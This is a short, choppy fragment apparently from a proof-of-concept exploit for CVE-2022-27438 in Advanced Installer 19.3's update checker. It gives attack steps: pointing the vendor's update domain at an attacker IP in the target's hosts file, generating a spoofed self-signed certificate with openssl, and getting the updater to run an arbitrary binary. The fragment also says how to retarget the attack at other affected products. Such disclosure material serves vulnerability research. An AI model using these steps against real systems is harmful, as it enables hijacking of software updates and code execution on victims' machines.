
Caphyon Ltd Advanced Installer 19.3 "CustomDetection" Update Check Remote Code Execution Vulnerability.
Usage: python3 cve-2022-27438_poc.py
Details in the report at gerr.re.
For other affected products, you have to change the update server and update configuration filename. These can often be found in the updater .ini in the application installation directory.
www.advancedinstaller.com to our attacker ip;
c:\windows\system32\drivers\etc\hosts on the target.
openssl req -new -x509 -keyout www.advancedinstaller.com.pem -out www.advancedinstaller.com.pem -days 365 -nodes -subj "/CN=www.advancedinstaller.com"C:\Program Files (x86)\Caphyon\Advanced Installer 19.3\bin\x86\updater.exe;As a result, the binary specified in CustomDetection with parameters specified in CustomDetectionParameters is executed in the context of the current user.